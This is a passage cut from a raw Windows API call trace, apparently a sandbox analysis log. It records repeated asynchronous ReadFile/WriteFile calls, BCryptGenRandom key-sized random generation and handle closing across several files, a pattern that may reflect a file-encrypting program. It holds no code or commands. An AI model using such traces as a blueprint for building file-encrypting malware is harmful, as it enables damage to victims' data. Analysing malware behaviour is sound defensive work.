nNumberOfBytesToRead=0x31883, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.504] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x15d49, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.506] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.521] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1e836, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.537] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x19a5d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.539] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.553] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17742, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.555] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.582] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2645, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.583] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.584] CloseHandle (hObject=0x2a4) returned 1 [0161.584] free (_Block=0x3df0008) [0161.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.620] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.620] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.620] free (_Block=0x3e305b8) [0161.620] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.620] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.621] free (_Block=0x1fa91d0) [0161.621] free (_Block=0x1fa2ed8) [0161.621] free (_Block=0x1fa90b8) [0161.621] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.637] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.637] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.651] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x15f6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.662] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.670] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x31e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0161.681] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.695] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1ae0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.719] CloseHandle (hObject=0x2a4) returned 1 [0161.719] free (_Block=0x3df0008) [0161.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.727] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.739] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0161.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.747] CloseHandle (hObject=0x3cc) returned 1 [0161.747] free (_Block=0x3f70048) [0161.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.749] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.785] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.799] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.800] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.812] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.812] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.812] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.812] free (_Block=0x3e305b8) [0161.812] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.812] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.813] free (_Block=0x1fa91d0) [0161.813] free (_Block=0x1fa2ed8) [0161.813] free (_Block=0x1fa90b8) [0161.813] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.813] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.822] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.822] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.822] free (_Block=0x3e305b8) [0161.822] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.822] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.823] free (_Block=0x1fa91d0) [0161.823] free (_Block=0x1fa2ed8) [0161.823] free (_Block=0x1fa90b8) [0161.823] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0161.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.839] CloseHandle (hObject=0x3cc) returned 1 [0161.839] free (_Block=0x3d70450) [0161.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.859] CloseHandle (hObject=0x2a8) returned 1 [0161.859] free (_Block=0x3df0008) [0161.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.864] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x194a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0161.877] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.891] CloseHandle (hObject=0x338) returned 1 [0161.892] free (_Block=0x3e70008) [0161.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.892] CloseHandle (hObject=0x3cc) returned 1 [0161.893] free (_Block=0x3d70450) [0161.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.893] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.210] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x7660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0162.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.222] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x788, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.230] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xba4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0162.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0162.268] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.268] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.269] free (_Block=0x3e305b8) [0162.269] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.269] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.269] free (_Block=0x1fa91d0) [0162.269] free (_Block=0x1fa2ed8) [0162.269] free (_Block=0x1fa90b8) [0162.269] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.311] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0162.311] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0162.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0162.323] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.324] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.324] free (_Block=0x3e305b8) [0162.324] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.324] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.324] free (_Block=0x1fa91d0) [0162.324] free (_Block=0x1fa2ed8) [0162.324] free (_Block=0x1fa90b8) [0162.324] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.332] CloseHandle (hObject=0x308) returned 1 [0162.332] free (_Block=0x3df0008) [0162.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.340] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7c46, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.366] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x54a8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.393] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.418] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0162.418] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.556] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2230, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0162.564] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x0, 